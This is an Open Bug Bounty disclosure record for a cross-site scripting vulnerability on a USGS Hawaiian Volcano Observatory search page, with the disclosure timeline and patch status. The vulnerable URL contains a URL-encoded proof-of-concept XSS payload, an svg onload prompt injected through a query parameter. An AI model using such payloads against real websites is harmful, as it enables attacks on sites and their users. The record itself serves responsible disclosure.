hvo.wr.usgs.gov XSS vulnerability

2016-03-14T01:37:00
ID OBB:141391
Type openbugbounty
Reporter ahmetomeroglu
Modified 2016-08-29T17:33:00

Description

Vulnerable URL:
http://hvo.wr.usgs.gov/volcanowatch/searchSubmit.php?token=788fed4cefcf457afc6984efa7c19031a3325d2a93527293d2ced18bf9b7bb97&newSearch;=true&title;=test&article;=%27%22%3E%3Csvg%20onload=prompt%28/XSSPOSED/%29%3E&weeklyUpdate;=&startDate;=&endDate;=&searchType;=inclusive&__ncforminfo=JfASMHPbBq9oOIvUaE_aDJ7i8KahOz2DPYrbrLVUhy_Yk7_zG0laRUSttbln_N-USaDpf12pMmugLtxKDkT8VXglwCTe4km9jUlkcj5GMaA_nEaoAZAmBEZdpfuz1SanDxcqKLDN8dK-UVcUYwDmMuw-1qeH76QF_S_IDKknnd6xDfZLerop7A%3D%3D
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 7
VIP website status:| Yes
Check hvo.wr.usgs.gov SSL connection:| (Grade: B-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 14 March, 2016 01:37 GMT
Generic security notifications sent to website owner| 14 March, 2016 01:39 GMT
Notification sent to subscribers (without technical details)| 14 March, 2016 02:17 GMT
Vulnerability details disclosed by researcher| 29 August, 2016 02:12 GMT
Vulnerability patched by the website owner| 29 August, 2016 17:33 GMT